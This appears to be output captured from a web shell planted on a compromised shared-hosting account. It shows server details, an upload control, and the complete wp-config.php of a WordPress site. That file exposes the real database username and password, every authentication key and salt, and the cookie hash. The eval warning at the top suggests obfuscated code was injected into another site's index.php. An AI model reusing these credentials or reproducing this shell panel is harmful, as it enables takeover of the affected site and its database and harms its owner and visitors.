Warning: gzdecode(): data error in /home/u756937133/domains/printsgiggles.com/public_html/index.php(1) : eval()'d code on line 1
HEX
HEX
Server: LiteSpeed
System: Linux us-phx-web629.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User: u756937133 (756937133)
PHP: 8.2.30
Disabled: passthru,chgrp
Upload Files
File: /home/u756937133/domains/inovaixstudio.com/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u756937133_ySkpo' );

/** Database username */
define( 'DB_USER', 'u756937133_Kz3gU' );

/** Database password */
define( 'DB_PASSWORD', 'L1hezPviAj' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'ZEBUW{.:naGdI(,TvM1(K#`%2I+pZNPXg7(;! }UD@[{YzkN/*QDAX(Eys<ersD%' );
define( 'SECURE_AUTH_KEY',   'cpHyg~#v-`o/FOdwoQ5Z;m=U9f0}X56n2tUD$=vLI.]9F7!cIs`BxOc~w[Q<EPjI' );
define( 'LOGGED_IN_KEY',     '=IzsyO9SaR BLFK~q3 }R@grQU>bR)Tg[;Q~bC6/FzO2x6Y:[X~^trB=ozxUgZSN' );
define( 'NONCE_KEY',         'dG}ke9St^NDL,1_0FvdN%BT$7$1Tjduz>gV%v5A95MKl]0DPl{!j]xZ{&H@6gv#H' );
define( 'AUTH_SALT',         ' ADRS).Ko5K_Ls<~mQ<2W)6-8U0lB K}S9}8nD#)aoHh6ZL03|T!>4&4e [<G`a6' );
define( 'SECURE_AUTH_SALT',  '0M@poj^BW`03^f_1IJ((}%jyen%>q2zC:T~5Qmm^g)7sUWXnYs~>08XMK/z$o)k-' );
define( 'LOGGED_IN_SALT',    'PS_iT6f6gy}C?(wt=tS._VE,_iB!;^ BwU?XHonr{L%avY 6AlhJe[jqN?[l!{#[' );
define( 'NONCE_SALT',        '>o:-]m%3^[^pa;[qW;lF}edy!h]b[VM34ec*,WoXiSnVB6)9;HK;Wq$daR=Q%zoJ' );
define( 'WP_CACHE_KEY_SALT', 'g(TnfT!gRPi7*`Y%Wg7oQ8w,IF:!$3J-!N[|Wz49oOGnY!_L_K#w3fx)Y2dF6UKD' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';


/* Add any custom values between this line and the "stop editing" line. */



/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}

define( 'FS_METHOD', 'direct' );
define( 'COOKIEHASH', '83d533f05003e6bde81bd065cf815ee5' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';